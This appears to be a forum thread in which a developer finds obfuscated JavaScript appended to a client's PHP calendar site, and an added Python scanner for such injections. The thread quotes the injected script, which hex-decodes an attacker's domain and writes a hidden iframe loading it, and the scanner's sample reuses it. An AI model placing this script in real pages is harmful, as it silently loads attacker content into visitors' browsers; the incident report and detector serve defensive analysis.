javascript - client's website was attacked, eeek!


Well, I think this day was coming.

My client's website has been compromised and blacklisted by Google. When you load the main page, this JavaScript is automatically added at the bottom of the document:

  <script type="text/javascript">
  var str = 'google-analytics.com';
  var str2 = '6b756c6b61726e696f6f37312e636f6d';
  str4 = 'php';
  var str3 = 'if';
  str = '';
  for (var i = 0; i < str2.length; i = i + 2) { str = str + '%' + str2.substr(i, 2); }
  str = unescape(str);
  document.write('<' + str3 + 'rame width=1 height=1 src="http://' + str + '/index.' + str4 + '?id=382" style="visibility: hidden;"></' + str3 + 'rame>');
  </script>
  </head>
  <body>
  <iframe src="http://kulkarnioo71.com/index.php?id=382" style="visibility: hidden;" width="1" height="1"></iframe>

I have not dissected it yet, but it is clearly an attacker trying to pose as Google Analytics. What I cannot wrap my head around is that if I remove every single bit of HTML from the main page, so that the index is an empty document, the JavaScript still gets embedded. How is this possible?

Update

  • The website is a very simple calendar application, running on Devadasi Unix at $10/month, MySQL, PHP.

  • This is not specific to my computer, because my client called me with the problem. I am also getting this on all the computers (4).

I will run a scan on the webserver ...

Identifying the source

Well, I found out where the JavaScript is coming from. I had simply cleared the template.html file, but the page still runs through my PHP templating system. Obviously, some code got appended to the bottom of my index.php and main.php files. How is this possible?

A little more background:

  • This is a calendar application, as outlined above, and is used only by my client's small company. A login is needed, and only 5 or so people have accounts. I can guarantee that none of them would try any kind of shenanigans. I obviously cannot guarantee that someone did not get hold of their information and try shenanigans, though.
  • Sadly, I made this website about 4 years ago, so I'm not really 100% confident that I protected against everything kids are trying nowadays, but I still do not understand how an attacker could possibly have gained access to the webserver to add this JavaScript to these PHP files.

Any fake HTTP modules (in IIS), or whatever the Apache equivalent may be, can modify the content of any HTTP request, or append to it, even for static files. This may suggest that the server itself has been compromised.

EDIT: If you tell us what type of web server you are using, then we will be able to give more specific suggestions for troubleshooting.
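
Added example, not part of the original posts: a Python check for the traits of the script quoted in the question (a hex-encoded host name, unescape() feeding document.write(), a hidden iframe, and code appended after the closing </html>), meant to be run over a copy of the web root to list every affected file. The function names, the file extensions and the sample page are constructed for illustration.

```python
import os
import re

HEX_LITERAL = re.compile(r"""['"]((?:[0-9a-fA-F]{2}){4,})['"]""")
HOSTNAME = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$", re.I)
PATTERNS = {
    "hidden iframe": re.compile(r"<iframe\b[^>]*visibility\s*:\s*hidden", re.I),
    "unescape() feeding document.write()": re.compile(
        r"unescape\s*\(.*document\.write\s*\(", re.I | re.S),
    "content after </html>": re.compile(r"</html>\s*\S", re.I),
}

def decode_hex_hosts(text):
    """Decode quoted hex literals; keep the ones that spell a hostname."""
    hosts = []
    for literal in HEX_LITERAL.findall(text):
        try:
            decoded = bytes.fromhex(literal).decode("ascii")
        except ValueError:  # non-ASCII bytes: not a hidden hostname
            continue
        if HOSTNAME.match(decoded):
            hosts.append(decoded)
    return hosts

def inspect_text(text):
    """Return the findings for one file's contents (empty list if clean)."""
    findings = [label for label, rx in PATTERNS.items() if rx.search(text)]
    return findings + ["hex-encoded host: " + h for h in decode_hex_hosts(text)]

def scan_tree(root, exts=(".php", ".html", ".htm")):
    """Map each file under root that has findings to those findings."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in (f for f in files if f.lower().endswith(exts)):
            path = os.path.join(folder, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = inspect_text(fh.read())
            if findings:
                report[path] = findings
    return report

# Constructed sample: a clean page with the question's script appended.
SAMPLE = """<html><body>Calendar</body></html>
<script>var str2='6b756c6b61726e696f6f37312e636f6d';var str='';
for(var i=0;i<str2.length;i=i+2){str=str+'%'+str2.substr(i,2);}
str=unescape(str);document.write('<'+'if'+'rame src="http://'+str+'/">');</script>"""

if __name__ == "__main__":
    print(inspect_text(SAMPLE))
```

Files that scan_tree() reports should be compared against a known-good copy of the site, since the check only lists where code with these traits is present and not how it was written there.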

